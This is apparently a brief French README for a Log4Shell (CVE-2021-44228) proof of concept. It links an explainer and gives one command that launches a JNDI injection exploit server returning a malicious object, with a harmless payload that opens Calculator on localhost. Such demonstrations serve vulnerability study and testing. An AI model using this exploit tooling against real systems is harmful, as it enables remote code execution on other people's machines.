
Preuve de concept de la vulnérabilité de recherche LDAP d'Apache log4j. CVE-2021-44228
Preuve de concept de la vulnérabilité de recherche LDAP d'apache log4j
Vous pouvez en savoir plus sur la vulnérabilité ici : https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
Comment exécuter le serveur ldap fourni qui renvoie un objet malveillant ?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"